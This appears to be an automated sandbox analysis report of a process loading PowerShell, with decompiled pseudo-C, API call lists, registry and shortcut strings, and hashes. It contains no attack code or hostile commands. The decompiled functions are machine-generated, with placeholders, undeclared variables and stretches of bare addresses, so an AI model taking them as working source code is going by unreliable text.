                                                                                                                                                                                                                              0x0125c03c
                                                                                                                                                                                                                              0x0125c042
                                                                                                                                                                                                                              0x0125c044
                                                                                                                                                                                                                              0x0125c046
                                                                                                                                                                                                                              0x0125c051
                                                                                                                                                                                                                              0x0125c052
                                                                                                                                                                                                                              0x0125c05c
                                                                                                                                                                                                                              0x0125c067
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0125BC99
                                                                                                                                                                                                                              • RegGetValueW.ADVAPI32(80000002,SOFTWARE\Microsoft\PowerShell\3,ConsoleHostShortcutTargetX86,10000006,00000000,00000000,?,00000030,0125C2B0), ref: 0125BCEA
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0125BD1F
                                                                                                                                                                                                                              • RegGetValueW.ADVAPI32(80000002,SOFTWARE\Microsoft\PowerShell\3,ConsoleHostShortcutTargetX86,10000006,00000000,00000000,?), ref: 0125BD40
                                                                                                                                                                                                                              • SetConsoleTitleW.KERNEL32(?), ref: 0125BDCF
                                                                                                                                                                                                                              • free.MSVCRT(?), ref: 0125BDD8
                                                                                                                                                                                                                              • CoCreateInstance.OLE32(012531B0,00000000,00000001,0125334C,00000000,?,?), ref: 0125BE47
                                                                                                                                                                                                                                • Part of subcall function 0125C81E: GetCurrentProcess.KERNEL32(?,?,0125BCC4,00000030,0125C2B0), ref: 0125C824
                                                                                                                                                                                                                              • CoCreateInstance.OLE32(012531D0,00000000,00000003,0125332C,?,%windir%\System32\WindowsPowerShell\v1.0\powershell.exe,?), ref: 0125BF08
                                                                                                                                                                                                                              • free.MSVCRT(00000000,?,?,012606E8,00000000,00000001,?,00000004), ref: 0125BF65
                                                                                                                                                                                                                              • free.MSVCRT(?,00000000,?,?,012606E8,00000000,00000001,?,00000004), ref: 0125BF6D
                                                                                                                                                                                                                              • free.MSVCRT(?,?,?,012606E8,00000000,00000001,?,00000004), ref: 0125BF76
                                                                                                                                                                                                                                • Part of subcall function 0125C782: GetFileAttributesW.KERNEL32(%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk,0125BD8B), ref: 0125C785
                                                                                                                                                                                                                              • #30.ATL(00000004,00000000,?,00000004), ref: 0125BFD9
                                                                                                                                                                                                                              • free.MSVCRT(?,?,?,%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe,00000000,00000001,?,00000004,?,00000004), ref: 0125BFFE
                                                                                                                                                                                                                              • free.MSVCRT(?,?,?,%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe,00000000,00000001,?,00000004,?,00000004), ref: 0125C007
                                                                                                                                                                                                                              • #30.ATL(00000004,00000000,?,00000004,?,00000004), ref: 0125C05C
                                                                                                                                                                                                                              • free.MSVCRT(?,?,?,%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe,00000000,00000000,?,00000004,?,00000004,?,00000004), ref: 0125C07B
                                                                                                                                                                                                                              • free.MSVCRT(?,?,?,%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe,00000000,00000000,?,00000004,?,00000004,?,00000004), ref: 0125C084
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • %windir%\System32\WindowsPowerShell\v1.0\powershell.exe, xrefs: 0125BECB, 0125BEE5
                                                                                                                                                                                                                              • SOFTWARE\Microsoft\PowerShell\3, xrefs: 0125BCE0, 0125BD36
                                                                                                                                                                                                                              • %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell (x86).lnk, xrefs: 0125BD68
                                                                                                                                                                                                                              • %AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell(x86).lnk, xrefs: 0125BD58
                                                                                                                                                                                                                              • %ProgramData%\Microsoft\Windows\Start Menu\Programs\System Tools\Windows PowerShell.lnk, xrefs: 0125BD8F
                                                                                                                                                                                                                              • %systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe, xrefs: 0125BFE2, 0125BFEC, 0125C06B
                                                                                                                                                                                                                              • %ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk, xrefs: 0125BD78
                                                                                                                                                                                                                              • ConsoleHostShortcutTarget, xrefs: 0125BCCD, 0125BCDF, 0125BD35
                                                                                                                                                                                                                              • %AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk, xrefs: 0125BD7F, 0125BDFB, 0125BE20
                                                                                                                                                                                                                              • %ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk, xrefs: 0125BD9F
                                                                                                                                                                                                                              • ConsoleHostShortcutTargetX86, xrefs: 0125BCC4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$CreateInstanceValue$AttributesConsoleCurrentFileH_prolog3_ProcessTitlememset
                                                                                                                                                                                                                              • String ID: %AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell(x86).lnk$%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk$%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell (x86).lnk$%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk$%ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell (x86).lnk$%ProgramData%\Microsoft\Windows\Start Menu\Programs\System Tools\Windows PowerShell.lnk$%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe$%windir%\System32\WindowsPowerShell\v1.0\powershell.exe$ConsoleHostShortcutTarget$ConsoleHostShortcutTargetX86$SOFTWARE\Microsoft\PowerShell\3
                                                                                                                                                                                                                              • API String ID: 3687710492-3771833276
                                                                                                                                                                                                                              • Opcode ID: 3a729c583178f6204c421b6725a5877a999b40660db8627eb84fca01a2a96755
                                                                                                                                                                                                                              • Instruction ID: 5b6485b8ee168658443553a52878fa62de2b3c641f2c17bbc4cc883b747cacc7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a729c583178f6204c421b6725a5877a999b40660db8627eb84fca01a2a96755
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64D19371E20216AFDB55DFA4D9C5AFEBB79EF48750F104119EE01B7290EB70AD108BA0
                                                                                                                                                                                                                              Uniqueness
                                                                                                                                                                                                                              • Uniqueness Score: -1.00%

                                                                                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                                                                                              			E0125D6E4(void* __eflags) {
                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                              				char _v180;
                                                                                                                                                                                                                              				char _v352;
                                                                                                                                                                                                                              				char _v524;
                                                                                                                                                                                                                              				short _v1044;
                                                                                                                                                                                                                              				WCHAR* _v1048;
                                                                                                                                                                                                                              				signed int _v1052;
                                                                                                                                                                                                                              				signed int _v1056;
                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                              				signed int _t72;
                                                                                                                                                                                                                              				signed int _t74;
                                                                                                                                                                                                                              				WCHAR* _t83;
                                                                                                                                                                                                                              				signed char _t86;
                                                                                                                                                                                                                              				signed char _t87;
                                                                                                                                                                                                                              				signed int _t88;
                                                                                                                                                                                                                              				struct HINSTANCE__* _t90;
                                                                                                                                                                                                                              				signed short _t93;
                                                                                                                                                                                                                              				signed int _t96;
                                                                                                                                                                                                                              				signed int _t101;
                                                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                                                              				signed int _t114;
                                                                                                                                                                                                                              				signed int _t117;
                                                                                                                                                                                                                              				signed int _t121;
                                                                                                                                                                                                                              				struct HINSTANCE__* _t128;
                                                                                                                                                                                                                              				char* _t158;
                                                                                                                                                                                                                              				signed int _t159;
                                                                                                                                                                                                                              				signed int _t160;
                                                                                                                                                                                                                              
				_t72 =  *0x1260358; // 0xc21f7063
				_v8 = _t72 ^ _t160;
				_t158 = 0;
				_v1048 = 0;
				_t74 = E0125D220();
				 *0x12608fc = _t74;
				_t159 = 0;
				_t128 = LoadLibraryExW(L"powershell.exe", 0, _t74 & 0x00000020 | 0x00000002);
				if(_t128 == 0) {
					L46:
					_t77 = 0;
					__eflags = 0;
				} else {
					if(( *0x12608fc & 0x00000020) == 0) {
						if(SearchPathW(0, L"powershell.exe", 0, 0x104,  &_v1044,  &_v1048) == 0) {
							FreeLibrary(_t128);
							goto L46;
						} else {
							_t83 = _v1048;
							if(_t83 != 0) {
								__eflags = 0;
								_t158 =  &_v1044;
								 *((short*)(_t83 - 2)) = 0;
							} else {
								_v1048 =  &_v1044;
							}
							if(FindResourceExW(_t128, ?str?, 1, 0) == 0) {
								L31:
								__eflags = _t128 & 0x00000001;
								if((_t128 & 0x00000001) != 0) {
									FreeLibrary(_t128);
									_t86 = E0125D220();
									__eflags = _t86 & 0x00000038;
									if((_t86 & 0x00000038) == 0) {
										_t87 = E0125D220();
										__eflags = _t87 & 0x00000026;
										_t88 = 0;
										_t70 = (_t87 & 0x00000026) != 0;
										__eflags = _t70;
										_t90 = LoadLibraryExW(L"powershell.exe", 0, _t88 & 0xffffff00 | _t70);
									} else {
										_push(_v1048);
										E0125D56C( &_v1044, 0x104, L"%s\\%s", _t158);
										_t155 = 1;
										_t90 = E0125D4C4( &_v1044, 1, 0);
									}
									_t128 = _t90;
								}
								_t77 = _t128;
							} else {
								_t93 =  *0x12608fc; // 0x0
								if((_t93 & 0x00000004) == 0) {
									__eflags = _t93 & 0x00000003;
									if((_t93 & 0x00000003) == 0) {
										goto L31;
									} else {
										_v1056 = E0125D170() & 0x0000ffff;
										_t155 =  &_v180;
										_t96 = E0125D393(E0125D170() & 0x0000ffff,  &_v180,  &_v524,  &_v352);
										__eflags = _t96;
										if(_t96 == 0) {
											goto L31;
										} else {
											_t155 = _t158;
											_t159 = E0125D32D(_t128, _t158,  &_v180, _v1048);
											__eflags = _t159;
											if(_t159 != 0) {
												goto L41;
											} else {
												_t155 = _t158;
												_t101 = E0125D32D(_t128, _t158,  &_v524, _v1048);
												_t159 = _t101;
												__eflags = _t159;
												if(_t159 != 0) {
													goto L41;
												} else {
													__eflags = _v352 - _t101;
													if(_v352 == _t101) {
														L40:
														_t138 = 0x409;
														__eflags = 0x409 - _v1056;
														goto L27;
													} else {
														_t155 = _t158;
														_t159 = E0125D32D(_t128, _t158,  &_v352, _v1048);
														__eflags = _t159;
														if(_t159 != 0) {
															goto L41;
														} else {
															goto L40;
														}
													}
												}
											}
										}
									}
								} else {
									__imp__GetUserDefaultUILanguage();
									_t109 = _t93 & 0x0000ffff;
									_v1052 = _t109;
									if(_t109 == 0x404) {
										_t109 = E0125D111() & 0x0000ffff;
										L10:
										_v1052 = _t109;
									}
									_t155 =  &_v180;
									if(E0125D393(_t109,  &_v180,  &_v524,  &_v352) == 0) {
										L30:
										__eflags = _t159;
										if(_t159 != 0) {
											goto L41;
										} else {
											goto L31;
										}
									} else {
										_t155 = _t158;
										_t159 = E0125D32D(_t128, _t158,  &_v180, _v1048);
										if(_t159 != 0) {
											L41:
											FreeLibrary(_t128);
											_t77 = _t159;
										} else {
											_t155 = _t158;
											_t114 = E0125D32D(_t128, _t158,  &_v524, _v1048);
											_t159 = _t114;
											if(_t159 != 0) {
												goto L41;
											} else {
												if(_v352 == _t114) {
													L16:
													if(_v1052 != 0xc04) {
														__imp__GetSystemDefaultUILanguage();
														_t116 = 0xc04;
														_v1056 = 0xc04;
														__eflags = 0xc04 - _v1052;
														if(0xc04 == _v1052) {
															L25:
															_t138 = 0x409;
															__eflags = 0x409 - _v1052;
															if(0x409 == _v1052) {
																L29:
																_t155 = _t158;
																_t159 = E0125D32D(_t128, _t158, 0, _v1048);
																goto L30;
                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                              																__eflags = 0x409 - _t116;
                                                                                                                                                                                                                              																L27:
                                                                                                                                                                                                                              																if(__eflags == 0) {
                                                                                                                                                                                                                              																	goto L29;
                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                              																	E0125D393(_t138,  &_v180,  &_v524, 0);
                                                                                                                                                                                                                              																	_t155 = _t158;
                                                                                                                                                                                                                              																	_t159 = E0125D32D(_t128, _t158,  &_v180, _v1048);
                                                                                                                                                                                                                              																	__eflags = _t159;
                                                                                                                                                                                                                              																	if(_t159 != 0) {
                                                                                                                                                                                                                              																		goto L41;
                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                              																		goto L29;
                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                              														} else {
                                                                                                                                                                                                                              															_t155 =  &_v180;
                                                                                                                                                                                                                              															_t117 = E0125D393(0xc04,  &_v180,  &_v524,  &_v352);
                                                                                                                                                                                                                              															__eflags = _t117;
                                                                                                                                                                                                                              															if(_t117 == 0) {
                                                                                                                                                                                                                              																goto L31;
                                                                                                                                                                                                                              															} else {
                                                                                                                                                                                                                              																_t155 = _t158;
                                                                                                                                                                                                                              																_t159 = E0125D32D(_t128, _t158,  &_v180, _v1048);
                                                                                                                                                                                                                              																__eflags = _t159;
                                                                                                                                                                                                                              																if(_t159 != 0) {
                                                                                                                                                                                                                              																	goto L41;
                                                                                                                                                                                                                              																} else {
                                                                                                                                                                                                                              																	_t155 = _t158;
                                                                                                                                                                                                                              																	_t121 = E0125D32D(_t128, _t158,  &_v524, _v1048);
                                                                                                                                                                                                                              																	_t159 = _t121;
                                                                                                                                                                                                                              																	__eflags = _t159;
                                                                                                                                                                                                                              																	if(_t159 != 0) {
                                                                                                                                                                                                                              																		goto L41;
                                                                                                                                                                                                                              																	} else {
                                                                                                                                                                                                                              																		__eflags = _v352 - _t121;
                                                                                                                                                                                                                              																		if(_v352 == _t121) {
                                                                                                                                                                                                                              																			L24:
                                                                                                                                                                                                                              																			_t116 = _v1056;
                                                                                                                                                                                                                              																			goto L25;
                                                                                                                                                                                                                              																		} else {
                                                                                                                                                                                                                              																			_t155 = _t158;
                                                                                                                                                                                                                              																			_t159 = E0125D32D(_t128, _t158,  &_v352, _v1048);
                                                                                                                                                                                                                              																			__eflags = _t159;
                                                                                                                                                                                                                              																			if(_t159 != 0) {
                                                                                                                                                                                                                              																				goto L41;
                                                                                                                                                                                                                              																			} else {
                                                                                                                                                                                                                              																				goto L24;
                                                                                                                                                                                                                              																			}
                                                                                                                                                                                                                              																		}
                                                                                                                                                                                                                              																	}
                                                                                                                                                                                                                              																}
                                                                                                                                                                                                                              															}
                                                                                                                                                                                                                              														}
                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                              														_t109 = 0x404;
                                                                                                                                                                                                                              														goto L10;
                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                                              													_t155 = _t158;
                                                                                                                                                                                                                              													_t159 = E0125D32D(_t128, _t158,  &_v352, _v1048);
                                                                                                                                                                                                                              													if(_t159 != 0) {
                                                                                                                                                                                                                              														goto L41;
                                                                                                                                                                                                                              													} else {
                                                                                                                                                                                                                              														goto L16;
                                                                                                                                                                                                                              													}
                                                                                                                                                                                                                              												}
                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              				__eflags = _v8 ^ _t160;
                                                                                                                                                                                                                              				return E01259A40(_t77, _t128, _v8 ^ _t160, _t155, _t158, _t159);
                                                                                                                                                                                                                              			}

                                                                                                                                                                                                                              0x0125d6ef
                                                                                                                                                                                                                              0x0125d6f6
                                                                                                                                                                                                                              0x0125d6fc
                                                                                                                                                                                                                              0x0125d6fe
                                                                                                                                                                                                                              0x0125d704
                                                                                                                                                                                                                              0x0125d709
                                                                                                                                                                                                                              0x0125d70e
                                                                                                                                                                                                                              0x0125d723
                                                                                                                                                                                                                              0x0125d727
                                                                                                                                                                                                                              0x0125daae
                                                                                                                                                                                                                              0x0125daae
                                                                                                                                                                                                                              0x0125daae
                                                                                                                                                                                                                              0x0125d72d
                                                                                                                                                                                                                              0x0125d734
                                                                                                                                                                                                                              0x0125d75c
                                                                                                                                                                                                                              0x0125daa8
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d762
                                                                                                                                                                                                                              0x0125d762
                                                                                                                                                                                                                              0x0125d76a
                                                                                                                                                                                                                              0x0125d77a
                                                                                                                                                                                                                              0x0125d77c
                                                                                                                                                                                                                              0x0125d782
                                                                                                                                                                                                                              0x0125d76c
                                                                                                                                                                                                                              0x0125d772
                                                                                                                                                                                                                              0x0125d772
                                                                                                                                                                                                                              0x0125d798
                                                                                                                                                                                                                              0x0125d986
                                                                                                                                                                                                                              0x0125d986
                                                                                                                                                                                                                              0x0125d989
                                                                                                                                                                                                                              0x0125d990
                                                                                                                                                                                                                              0x0125d996
                                                                                                                                                                                                                              0x0125d99b
                                                                                                                                                                                                                              0x0125d99d
[Extraction residue: a single column of code addresses, 0x0125d79e through 0x0125daa1, interleaved with 0x00000000 entries; the instruction text and graph structure that accompanied these addresses are not present on the page.]
                                                                                                                                                                                                                              0x0125d918
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d918
                                                                                                                                                                                                                              0x0125d8fc
                                                                                                                                                                                                                              0x0125d8ef
                                                                                                                                                                                                                              0x0125d8cf
                                                                                                                                                                                                                              0x0125d8af
                                                                                                                                                                                                                              0x0125d86c
                                                                                                                                                                                                                              0x0125d86c
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d86c
                                                                                                                                                                                                                              0x0125d83e
                                                                                                                                                                                                                              0x0125d84a
                                                                                                                                                                                                                              0x0125d854
                                                                                                                                                                                                                              0x0125d858
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x0125d858
                                                                                                                                                                                                                              0x0125d83c
                                                                                                                                                                                                                              0x0125d82f
                                                                                                                                                                                                                              0x0125d80f
                                                                                                                                                                                                                              0x0125d7ef
                                                                                                                                                                                                                              0x0125d7a5
                                                                                                                                                                                                                              0x0125d798
                                                                                                                                                                                                                              0x0125d75c
                                                                                                                                                                                                                              0x0125d734
                                                                                                                                                                                                                              0x0125dab5
                                                                                                                                                                                                                              0x0125dac0

APIs
  • Part of subcall function 0125D220: memset.MSVCRT ref: 0125D253
  • Part of subcall function 0125D220: GetVersionExW.KERNEL32(?,?,00000000), ref: 0125D268
  • Part of subcall function 0125D220: GetVersionExW.KERNEL32(?,00000000), ref: 0125D284
• LoadLibraryExW.KERNEL32(powershell.exe,00000000,00000000), ref: 0125D71D
• SearchPathW.KERNEL32(00000000,powershell.exe,00000000,00000104,?,?), ref: 0125D754
• FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000), ref: 0125D790
• GetUserDefaultUILanguage.KERNEL32 ref: 0125D7AB
• GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?), ref: 0125D876
• FreeLibrary.KERNEL32(00000000), ref: 0125D990
• FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 0125DA7C
• LoadLibraryExW.KERNEL32(powershell.exe,00000000,00000000), ref: 0125DA9B
• FreeLibrary.KERNEL32(00000000), ref: 0125DAA8
Strings
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: Library$Free$DefaultLanguageLoadVersion$FindPathResourceSearchSystemUsermemset
• String ID: %s\%s$MUI$powershell.exe
• API String ID: 2934321554-1410073735
• Opcode ID: 104615406e2fc856830b02f7ddbc9f30e86a9352c050f737ab438b59de4d8414
• Instruction ID: 1324c0068a25f68953ee6243548c14607c00658c1035865f03749a4c50458718
• Opcode Fuzzy Hash: 104615406e2fc856830b02f7ddbc9f30e86a9352c050f737ab438b59de4d8414
• Instruction Fuzzy Hash: EAA198B1E1026E5BDF719BA49CD4BFF76799B84350F0081A5DE49A7242DA30CEC58F90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 26%
E0125CA89(void* __ebx, signed int __ecx, signed int* __edx, signed int* __edi, signed int __esi, void* __eflags) {
	signed int _t90;
	intOrPtr* _t91;
	intOrPtr* _t94;
	signed int _t96;
	signed int _t97;
	signed int _t107;
	signed int _t109;
	signed int* _t110;
	signed int _t113;
	signed int _t115;
	signed int _t116;
	signed int _t117;
	signed int _t120;
	signed int _t122;
	signed int _t123;
	signed int _t125;
	signed int* _t126;
	signed int* _t130;
	signed int _t133;
	signed int _t134;
	signed int* _t138;
	signed int _t142;
	signed int* _t146;
	signed int _t152;
	intOrPtr* _t166;
	signed int _t171;
	signed int* _t174;
	signed int* _t186;
	signed int* _t189;
	signed int _t197;
	intOrPtr* _t207;
	void* _t209;
	signed int* _t210;

	_t203 = __esi;
	_t200 = __edi;
	_push(0x40);
	E0125A5F0(E0125A941, __ebx, __edi, __esi);
	_t142 = __edx;
	 *(_t209 - 0x38) = __edx;
	 *(_t209 - 0x18) = __ecx;
	if(__edx == 0) {
		L5:
		L6:
		return E0125A59F(_t142, _t200, _t203);
	}
	_t146 =  *(_t209 + 8);
	if(_t146 == 0) {
		goto L5;
	}
	_t189 =  *(_t209 + 0xc);
	if(_t189 == 0) {
		goto L5;
	}
	 *__edx =  *__edx & 0x00000000;
	 *_t189 =  *_t189 | 0xffffffff;
	 *_t146 =  *_t146 | 0xffffffff;
	if(__ecx != 0) {
		 *(_t209 - 0x28) =  *(_t209 - 0x28) & 0x00000000;
		 *((short*)(_t209 - 0x4c)) = 0;
		 *((char*)(_t209 - 0x11)) = 0;
		E0125BBF3(_t209 - 0x4c, __ecx);
                                                                                                                                                                                                                              					 *((intOrPtr*)(_t209 - 4)) = 0;
                                                                                                                                                                                                                              					 *(_t209 - 0x1c) = 0;
                                                                                                                                                                                                                              					 *(_t209 - 0x34) = 0;
                                                                                                                                                                                                                              					 *(_t209 - 0x2c) = 0;
                                                                                                                                                                                                                              					 *(_t209 - 0x30) = 0;
                                                                                                                                                                                                                              					 *((char*)(_t209 - 4)) = 4;
                                                                                                                                                                                                                              					__imp__CoInitializeEx(0, 0);
                                                                                                                                                                                                                              					__eflags = 0;
                                                                                                                                                                                                                              					if(0 >= 0) {
                                                                                                                                                                                                                              						_t90 = _t209 - 0x1c;
                                                                                                                                                                                                                              						 *((char*)(_t209 - 0x11)) = 1;
                                                                                                                                                                                                                              						__imp__CoCreateInstance(0x1253210, 0, 1, 0x1253200, _t90);
                                                                                                                                                                                                                              						__eflags = _t90;
                                                                                                                                                                                                                              						if(_t90 >= 0) {
                                                                                                                                                                                                                              							_t91 =  *(_t209 - 0x1c);
                                                                                                                                                                                                                              							 *0x1261204(_t91, 0);
                                                                                                                                                                                                                              							 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0xfc))))();
                                                                                                                                                                                                                              							_t94 =  *(_t209 - 0x1c);
                                                                                                                                                                                                                              							_t210 = _t210 - 0x10;
                                                                                                                                                                                                                              							 *((short*)(_t209 - 0x24)) = 1;
                                                                                                                                                                                                                              							_t200 = _t210;
                                                                                                                                                                                                                              							asm("movsd");
                                                                                                                                                                                                                              							asm("movsd");
                                                                                                                                                                                                                              							asm("movsd");
                                                                                                                                                                                                                              							asm("movsd");
                                                                                                                                                                                                                              							_t203 =  *( *_t94 + 0xe8);
                                                                                                                                                                                                                              							_t152 = _t203;
                                                                                                                                                                                                                              							 *0x1261204(_t94, _t209 - 0x24);
                                                                                                                                                                                                                              							_t96 =  *_t203();
                                                                                                                                                                                                                              							__eflags = _t96;
                                                                                                                                                                                                                              							if(_t96 < 0) {
                                                                                                                                                                                                                              								L40:
                                                                                                                                                                                                                              								_t97 =  *(_t209 - 0x1c);
                                                                                                                                                                                                                              								_push(_t152);
                                                                                                                                                                                                                              								 *_t210 = _t97;
                                                                                                                                                                                                                              								__eflags = _t97;
                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                              									_t203 =  *( *_t97 + 4);
                                                                                                                                                                                                                              									 *0x1261204(_t97);
                                                                                                                                                                                                                              									 *( *( *_t97 + 4))();
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								E0125C5FD(1,  *(_t209 - 0x18), _t200, _t203, __eflags);
                                                                                                                                                                                                                              								L43:
                                                                                                                                                                                                                              								_t142 = 0;
                                                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                                                              								L44:
                                                                                                                                                                                                                              								E01259691(_t209 - 0x30);
                                                                                                                                                                                                                              								E01259691(_t209 - 0x2c);
                                                                                                                                                                                                                              								E01259691(_t209 - 0x34);
                                                                                                                                                                                                                              								E01259691(_t209 - 0x1c);
                                                                                                                                                                                                                              								E0125C219(_t209 - 0x4c);
                                                                                                                                                                                                                              								__eflags =  *((char*)(_t209 - 0x11));
                                                                                                                                                                                                                              								if( *((char*)(_t209 - 0x11)) != 0) {
                                                                                                                                                                                                                              									__imp__CoUninitialize();
                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                              								__imp__#6( *(_t209 - 0x28));
                                                                                                                                                                                                                              								goto L6;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							__eflags =  *((short*)(_t209 - 0x24));
                                                                                                                                                                                                                              							if( *((short*)(_t209 - 0x24)) == 0) {
                                                                                                                                                                                                                              								goto L40;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t107 =  *(_t209 - 0x1c);
                                                                                                                                                                                                                              							 *0x1261204(_t107, _t209 - 0x34);
                                                                                                                                                                                                                              							_t109 =  *((intOrPtr*)( *((intOrPtr*)( *_t107 + 0xb4))))();
                                                                                                                                                                                                                              							__eflags = _t109;
                                                                                                                                                                                                                              							if(_t109 < 0) {
                                                                                                                                                                                                                              								L39:
                                                                                                                                                                                                                              								_push( *(_t209 - 0x18));
                                                                                                                                                                                                                              								_t110 =  *0x12606dc; // 0x3403de0
                                                                                                                                                                                                                              								_push(0x12);
                                                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                                                              								_push(_t110);
                                                                                                                                                                                                                              								_t203 =  *_t110;
                                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                                              								 *0x1261204();
                                                                                                                                                                                                                              								 *((intOrPtr*)(_t203 + 4))();
                                                                                                                                                                                                                              								goto L43;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t113 =  *(_t209 - 0x34);
                                                                                                                                                                                                                              							__eflags = _t113;
                                                                                                                                                                                                                              							if(_t113 == 0) {
                                                                                                                                                                                                                              								goto L39;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t207 =  *((intOrPtr*)( *_t113 + 0x34));
                                                                                                                                                                                                                              							_t166 = _t207;
                                                                                                                                                                                                                              							 *0x1261204(_t113, _t209 - 0x2c);
                                                                                                                                                                                                                              							_t115 =  *_t207();
                                                                                                                                                                                                                              							__eflags = _t115;
                                                                                                                                                                                                                              							if(_t115 < 0) {
                                                                                                                                                                                                                              								goto L39;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t116 =  *(_t209 - 0x2c);
                                                                                                                                                                                                                              							__eflags = _t116;
                                                                                                                                                                                                                              							if(_t116 == 0) {
                                                                                                                                                                                                                              								goto L39;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							 *(_t209 - 0x20) =  *(_t209 - 0x20) & 0x00000000;
                                                                                                                                                                                                                              							_t200 = _t209 - 0x20;
                                                                                                                                                                                                                              							_push(_t166);
                                                                                                                                                                                                                              							 *_t210 = _t116;
                                                                                                                                                                                                                              							__eflags = _t116;
                                                                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                                                                              								 *0x1261204(_t116);
                                                                                                                                                                                                                              								 *((intOrPtr*)( *((intOrPtr*)( *_t116 + 4))))();
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							_t203 =  *(_t209 - 0x18);
                                                                                                                                                                                                                              							_t117 = E0125C8A4(1,  *(_t209 - 0x18), _t200, _t200,  *(_t209 - 0x18), __eflags);
                                                                                                                                                                                                                              							__eflags = _t117;
                                                                                                                                                                                                                              							if(_t117 == 0) {
                                                                                                                                                                                                                              								goto L43;
                                                                                                                                                                                                                              							} else {
								__eflags = E0125CF4C( *(_t209 - 0x20), _t203);
								if(__eflags == 0) {
									goto L43;
								}
								_push(L"/PSConsoleFile/PSVersion/text()");
								E0125BAF5(1, _t209 - 0x20, _t200, _t203, __eflags);
